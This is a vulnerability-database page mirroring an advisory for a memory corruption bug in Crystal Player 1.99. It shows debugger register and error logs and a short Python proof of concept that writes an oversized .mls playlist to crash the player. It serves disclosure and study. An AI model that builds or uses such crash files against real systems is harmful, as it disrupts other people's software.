header-logo
Suggest Exploit
vendor:
Crystal Player
by:
Not Available
5.5
CVSS
MEDIUM
Memory Corruption Vulnerability
Not Available
CWE
Product Name: Crystal Player
Affected Version From: Crystal Player 1.99
Affected Version To: Crystal Player 1.99
Patch Exists: NO
Related CWE: Not Available
CPE: Not Available
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Local
2015

Crystal Player 1.99 – Memory Corruption Vulnerability

A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file. Attackers can crash the software local by user inter action over mls (playlist).

Mitigation:

No solution or patch is available as of 21/01/2015.
Source

Exploit-DB raw data:

Document Title:
===============
Crystal Player 1.99 - Memory Corruption Vulnerability

Date:
=============
21/01/2015

Vendor Homepage: 
================
http://www.crystalreality.com/

Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Crystal Player 1.99.

Affected Product(s):
====================
Crystal Player 1.99

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file. 
Attackers can crash the software local by user inter action over mls (playlist).

--- DEBUG LOG ---
///registers
EAX 00000000
ECX 0006FE24
EDX 0006FE24
EBX 0013014C
ESP 0006F300
EBP 00060041
ESI 00FF4A00
EDI 00000001
EIP 0040F933 Crystal.0040F933
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 1  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 1  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1



--- ERROR LOG ---
Crystal+0xf933:
0040f933 8b5510          mov     edx,dword ptr [ebp+10h] ss:0023:00060051=????????


00060051 doesnt exist in the program aka not allowed .. so memcopy fails...


EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0040f933 (Crystal+0xf933)

Access violation when reading [00060051]

Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local attackers with userinteraction ...

#!/usr/bin/python

buffer = "A"*30000

filename = "Crash"+".mls"
file = open(filename, 'w')
file.write(buffer)
file.close()
print "[] Successfully MLS Created []"


How to perform:
=======================
1) Open Immunity Debugger and attach Crystal Player 1.99 
2) Run it, Now move .mls file that we generated by our python script to the player
3) Once again you have to move the same file in Crystal Player 1.99 for adding second playlist. 

When you perform above steps so application will crash. Analyze it on Immunity.

Solution - Fix & Patch:
=======================
Restrict working maximum size & set a own exception-handling for over-sized requests.

Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of the local crash method.

Authors:
==================
Kapil Soni (Haxinos)

Navigation

Suggest Exploit

Services By CQR